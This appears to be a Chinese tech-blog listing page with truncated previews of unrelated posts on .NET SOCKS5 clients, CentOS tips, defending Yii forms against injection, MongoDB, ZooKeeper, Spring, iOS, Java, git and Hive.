    http://www.cnblogs.com/zhujiechang/archive/2008/10/21/1316308.html  这里主要讲的是用.NET实现基于Socket5下面的代理协议进行客户端的通讯,Socket4的实现是类似的,注意的事,这里不是讲用C#实现一个代理服务器,因为实现一个代理服务器需要实现很多协议,头大,而且现在市面上有很多现成的代理服务器用,性能又好,
  • 运维 Centos问题汇总 dcj3sjt126com 云主机
    一、sh 脚本不执行的原因 sh脚本不执行的原因 只有2个 1.权限不够 2.sh脚本里路径没写完整。   二、解决You have new mail in /var/spool/mail/root 修改/usr/share/logwatch/default.conf/logwatch.conf配置文件 MailTo = MailFrom   三、查询连接数
  • Yii防注入攻击笔记 dcj3sjt126com sqlWEB安全yii
    网站表单有注入漏洞须对所有用户输入的内容进行个过滤和检查,可以使用正则表达式或者直接输入字符判断,大部分是只允许输入字母和数字的,其它字符度不允许;对于内容复杂表单的内容,应该对html和script的符号进行转义替换:尤其是<,>,',"",&这几个符号 这里有个转义对照表: http://blog.csdn.net/xinzhu1990/articl
  • MongoDB简介[一] eksliang mongodbMongoDB简介
    MongoDB简介 转载请出自出处:http://eksliang.iteye.com/blog/2173288 1.1易于使用        MongoDB是一个面向文档的数据库,而不是关系型数据库。与关系型数据库相比,面向文档的数据库不再有行的概念,取而代之的是更为灵活的“文档”模型。        另外,不
  • zookeeper windows 入门安装和测试 greemranqq zookeeper安装分布式
    一、序言       以下是我对zookeeper 的一些理解:      zookeeper 作为一个服务注册信息存储的管理工具,好吧,这样说得很抽象,我们举个“栗子”。       栗子1号:       假设我是一家KTV的老板,我同时拥有5家KTV,我肯定得时刻监视
  • Spring之使用事务缘由(2-注解实现) ihuning spring
      Spring事务注解实现   1. 依赖包:     1.1 spring包:           spring-beans-4.0.0.RELEASE.jar           spring-context-4.0.0.
  • iOS App Launch Option 啸笑天 option
    iOS 程序启动时总会调用application:didFinishLaunchingWithOptions:,其中第二个参数launchOptions为NSDictionary类型的对象,里面存储有此程序启动的原因。   launchOptions中的可能键值见UIApplication Class Reference的Launch Options Keys节 。 1、若用户直接
  • jdk与jre的区别(_) macroli javajvmjdk
    简单的说JDK是面向开发人员使用的SDK,它提供了Java的开发环境和运行环境。SDK是Software Development Kit 一般指软件开发包,可以包括函数库、编译程序等。  JDK就是Java Development Kit JRE是Java Runtime Enviroment是指Java的运行环境,是面向Java程序的使用者,而不是开发者。 如果安装了JDK,会发同你
  • Updates were rejected because the tip of your current branch is behind qiaolevip 学习永无止境每天进步一点点众观千象git
    $ git push joe prod-2295-1 To [email protected]:joe.le/dr-frontend.git ! [rejected] prod-2295-1 -> prod-2295-1 (non-fast-forward) error: failed to push some refs to '[email protected]
  • [一起学Hive]之十四-Hive的元数据表结构详解 superlxw1234 hivehive元数据结构
    关键字:Hive元数据、Hive元数据表结构   之前在 “[一起学Hive]之一–Hive概述,Hive是什么”中介绍过,Hive自己维护了一套元数据,用户通过HQL查询时候,Hive首先需要结合元数据,将HQL翻译成MapReduce去执行。 本文介绍一下Hive元数据中重要的一些表结构及用途,以Hive0.13为例。   文章最后面,会以一个示例来全面了解一下,
  • Spring 3.2.14,4.1.7,4.2.RC2发布 wiselyman Spring 3
      Spring 3.2.14、4.1.7及4.2.RC2于6月30日发布。   其中Spring 3.2.1是一个维护版本(维护周期到2016-12-31截止),后续会继续根据需求和bug发布维护版本。此时,Spring官方强烈建议升级Spring框架至4.1.7 或者将要发布的4.2 。   其中Spring 4.1.7主要包含这些更新内容。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他